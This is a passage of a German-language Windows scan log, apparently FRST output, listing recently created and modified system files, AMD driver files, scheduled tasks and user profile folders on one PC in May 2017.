2017-05-07 18:11 - 2017-05-07 18:11 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00311192 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00095584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-05-07 18:09 - 2017-05-07 18:09 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\MSBuild
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\MSBuild
2017-05-07 18:09 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2017-05-07 18:09 - 2017-02-10 12:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2017-05-07 18:09 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2017-05-07 17:23 - 2017-05-21 21:01 - 01992350 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagwrn.xml
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagerr.xml
2017-05-07 17:17 - 2017-05-21 20:55 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-05-07 17:17 - 2017-05-07 21:26 - 00003268 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-05-07 17:17 - 2017-05-07 17:20 - 00004440 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2017-05-07 17:17 - 2017-05-07 17:17 - 00023140 _____ C:\WINDOWS\System32\Tasks\{0E0E0947-0F0F-7D0F-7D11-0E0F78051104}
2017-05-07 17:17 - 2017-05-07 17:17 - 00003556 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-05-07 17:17 - 2017-05-07 17:17 - 00003332 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-05-07 17:17 - 2017-05-07 17:17 - 00003282 _____ C:\WINDOWS\System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9}
2017-05-07 17:17 - 2017-05-07 17:17 - 00003084 _____ C:\WINDOWS\System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908}
2017-05-07 17:17 - 2017-05-07 17:17 - 00002736 _____ C:\WINDOWS\System32\Tasks\AutoKMS
2017-05-07 17:17 - 2017-05-07 17:17 - 00002668 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
2017-05-07 17:17 - 2017-05-07 17:17 - 00002580 _____ C:\WINDOWS\System32\Tasks\SamsungMagician
2017-05-07 17:17 - 2017-05-07 17:17 - 00002388 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\ASUS
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\ProgramData\USOShared
2017-05-07 17:15 - 2017-05-07 17:15 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-05-07 17:15 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-05-07 17:14 - 2017-05-14 22:59 - 00000000 ____D C:\Users\Dino
2017-05-07 17:14 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Vorlagen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Startmenü
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Netzwerkumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Lokale Einstellungen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Eigene Dateien
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Druckumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Verlauf
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Anwendungsdaten
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Anwendungsdaten
2017-05-07 17:13 - 2017-05-21 20:55 - 00342672 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-05-07 17:13 - 2017-05-21 20:55 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2017-05-07 17:13 - 2017-05-17 21:18 - 00000000 ____D C:\Program Files\AMD
2017-05-07 17:13 - 2017-05-16 18:16 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-05-07 17:13 - 2017-05-07 17:14 - 00000000 ____D C:\Program Files (x86)\ASUS
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_ASMBSW_01_11_00.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_TeeDriverx64_01011.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Realtek
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\ASUS
2017-05-07 17:13 - 2013-07-04 03:32 - 00028672 _____ (ASUSTek Computer Inc.) C:\WINDOWS\SysWOW64\AsIO.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00015232 _____ C:\WINDOWS\SysWOW64\Drivers\AsIO.sys
2017-05-07 13:03 - 2017-05-07 21:24 - 00000000 ___DC C:\WINDOWS\Panther
2017-05-03 17:47 - 2017-05-03 17:47 - 00001256 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Update- und Datenschutzeinstellungen.lnk
2017-05-03 17:47 - 2017-05-03 17:47 - 00000000 ____D C:\Users\Dino\AppData\Local\UNP
2017-05-03 17:21 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-05-03 17:21 - 2017-05-03 17:22 - 00000000 ____D C:\Program Files\UNP
2017-05-01 12:45 - 2017-05-07 17:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard
2017-05-01 12:45 - 2017-05-01 12:45 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\AMD

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-21 21:23 - 2016-12-06 18:58 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\Mozilla
2017-05-21 21:01 - 2017-03-20 06:41 - 00877602 _____ C:\WINDOWS\system32\perfh007.dat
2017-05-21 21:01 - 2017-03-20 06:41 - 00184122 _____ C:\WINDOWS\system32\perfc007.dat
2017-05-21 20:56 - 2017-02-05 21:11 - 00000000 ____D C:\Program Files\Bitdefender Agent
2017-05-21 20:56 - 2015-08-16 13:47 - 00000000 ___RD C:\Users\Dino\OneDrive
2017-05-21 20:55 - 2017-03-18 13:40 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2017-05-21 20:55 - 2017-02-05 21:39 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-05-21 20:55 - 2017-02-05 21:38 - 00014132 _____ C:\bdlog.txt
2017-05-21 20:55 - 2015-04-25 17:41 - 00000000 ____D C:\Program Files (x86)\Steam
2017-05-21 20:54 - 2017-02-05 21:41 - 00000085 _____ C:\WINDOWS\wininit.ini
2017-05-21 20:54 - 2017-02-05 21:40 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-05-21 12:27 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-05-20 14:33 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\System
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-05-19 14:20 - 2015-10-30 20:47 - 00000000 ____D C:\WINDOWS\ShellNew
2017-05-19 14:20 - 2013-08-22 15:25 - 00000076 _____ C:\WINDOWS\win.ini
2017-05-19 14:16 - 2017-02-05 20:54 - 00001079 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-05-19 14:16 - 2017-02-05 20:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-05-17 21:22 - 2017-03-18 13:40 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2017-05-17 21:18 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF
2017-05-17 21:18 - 2015-04-25 06:40 - 00000000 ____D C:\AMD
2017-05-16 18:06 - 2017-04-14 21:33 - 00924544 _____ (AMD) C:\WINDOWS\system32\coinst_17.10.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00551808 _____ C:\WINDOWS\system32\dgtrayicon.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00546688 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Rapidfire64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00531328 _____ C:\WINDOWS\system32\GameManager64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00478080 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\Rapidfire.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00365440 _____ C:\WINDOWS\SysWOW64\GameManager32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00278400 _____ C:\WINDOWS\system32\clinfo.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00276352 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00242048 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00191360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00169856 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00167808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00150912 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00135040 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00133504 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00044920 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\RapidFireServer64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00042368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\RapidFireServer.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01516416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00777088 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00551808 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00483712 _____ C:\WINDOWS\system32\atieah64.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00467328 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00411008 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00334208 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00245112 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00203648 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00156704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00148440 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00122744 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00115072 _____ C:\WINDOWS\system32\atidxx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00101760 _____ C:\WINDOWS\SysWOW64\atidxx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00068992 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ati2erec.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 10320248 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 08479104 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02536320 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amfrt64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02198400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amfrt32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00112512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00099192 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00864120 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00696192 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00514424 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00360312 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00091520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmcl64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00075136 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmcl32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00573800 _____ C:\WINDOWS\system32\amdmiracast.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00196176 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00164400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00139080 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00116072 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2017-05-12 20:28 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-05-10 21:47 - 2015-08-16 13:45 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-05-09 21:42 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-05-09 21:42 - 2015-05-01 17:30 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-05-09 21:40 - 2015-05-01 17:30 - 156335152 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-05-09 21:32 - 2015-04-25 06:35 - 00000000 ____D C:\Users\Dino\AppData\Local\Packages
2017-05-09 21:23 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-05-08 22:37 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-05-08 21:19 - 2015-04-25 07:09 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-05-08 21:13 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat
2017-05-07 21:26 - 2015-08-16 13:47 - 00002419 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-05-07 21:24 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-05-07 18:12 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2017-05-07 18:11 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning
2017-05-07 18:11 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI
2017-05-07 18:09 - 2017-03-18 22:56 - 00465408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00217600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll
